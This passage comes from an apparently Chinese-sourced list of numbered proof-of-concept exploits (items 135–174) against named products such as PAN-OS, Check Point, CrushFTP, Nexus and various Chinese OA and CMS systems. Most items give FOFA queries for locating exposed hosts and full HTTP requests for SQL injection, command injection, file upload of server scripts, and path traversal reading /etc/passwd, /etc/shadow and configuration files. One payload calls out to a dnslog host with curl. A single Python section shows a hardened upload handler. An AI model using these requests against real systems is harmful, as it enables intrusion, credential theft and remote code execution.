jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD
149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

The escaped quote (x\') is the probe; item 187 below gives a time-based variant of the same request.

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the .asmx body (omitted here as PAYLOAD, per the note at the top of the article). Verify with: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal / arbitrary file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and <fileFlow> carries the file content, which must be base64-encoded (encoded, not encrypted).
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: the ../ prefix places the file in the web root: http://x.x.x.x/dizxdell.aspx
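Items 157 to 161 above all hinge on a client-supplied file name reaching the filesystem unchanged; item 161 adds a ../ prefix so the .aspx lands in the web root. The Python below is an added example, not code from any of these products or from the original article: it puts the vulnerable join next to a hardened handler (directory components dropped, extension allow-list, containment check on the resolved path, strict base64 decode with a size cap). UPLOAD_DIR, ALLOWED_EXT and every function name are assumptions made for the demo.

```python
"""Client-controlled file names in an upload handler: the pattern the
UploadResume PoC above abuses (fileName carries ../, fileFlow carries base64),
shown next to a hardened version.

Added example, not code from the affected product. UPLOAD_DIR, ALLOWED_EXT and
the function names are assumptions made for this demo.
"""
import base64
import binascii
import os
from pathlib import Path
from typing import Optional

UPLOAD_DIR = Path("/srv/app/uploads")      # assumed storage root
ALLOWED_EXT = {".pdf", ".doc", ".docx", ".jpg", ".png"}
MAX_BYTES = 10 * 1024 * 1024


def vulnerable_target(file_name: str) -> Path:
    """Join the supplied name to the root unchanged, as the vulnerable
    handler effectively does. '../../../../x.aspx' climbs out of the root."""
    return Path(os.path.normpath(UPLOAD_DIR / file_name))


def hardened_target(file_name: str) -> Path:
    """Drop directory components, allow-list the extension, then prove the
    resolved path is still inside UPLOAD_DIR. Raise ValueError otherwise."""
    if "\x00" in file_name:
        raise ValueError("NUL byte in file name")
    # Treat both separators as directory separators so '..\\..\\x' is also
    # reduced to its last component, whatever OS the server runs on.
    base = file_name.replace("\\", "/").rsplit("/", 1)[-1].strip()
    if base in ("", ".", ".."):
        raise ValueError("empty file name")
    ext = Path(base).suffix.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    root = UPLOAD_DIR.resolve()
    target = (root / base).resolve()
    if not target.is_relative_to(root):          # Python 3.9+
        raise ValueError("path escapes upload root")
    return target


def decode_file_flow(file_flow_b64: str) -> bytes:
    """Decode the base64 body strictly (no stray characters) and cap its size."""
    try:
        data = base64.b64decode(file_flow_b64, validate=True)
    except binascii.Error as exc:
        raise ValueError("fileFlow is not valid base64") from exc
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    return data


def rejection_reason(file_name: str) -> Optional[str]:
    """None if the hardened checks accept the name, else the reason text."""
    try:
        hardened_target(file_name)
    except ValueError as exc:
        return str(exc)
    return None


def handle_upload(file_name: str, file_flow_b64: str) -> tuple:
    """Validate both fields before anything is written; return (path, size)."""
    target = hardened_target(file_name)
    data = decode_file_flow(file_flow_b64)
    # target.write_bytes(data) is deliberately omitted so the demo runs
    # without a writable UPLOAD_DIR.
    return target, len(data)


if __name__ == "__main__":
    # The PoC's own file name, as seen by each handler
    print(vulnerable_target("../../../../dizxdell.aspx"))   # escapes the root
    print(rejection_reason("../../../../dizxdell.aspx"))    # rejected
```

An allow-listed extension still does not prove the bytes are an image (items 155 and 176 send PHP with Content-Type: image/png), so pair this with content sniffing and serve the upload directory from a location where nothing executes.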

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file (renamed by the server): http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

Decoded: ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE. The CHAR() sequence spells "hello"; this is error-based, and an MSSQL conversion error echoing "hello" confirms the injection.

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

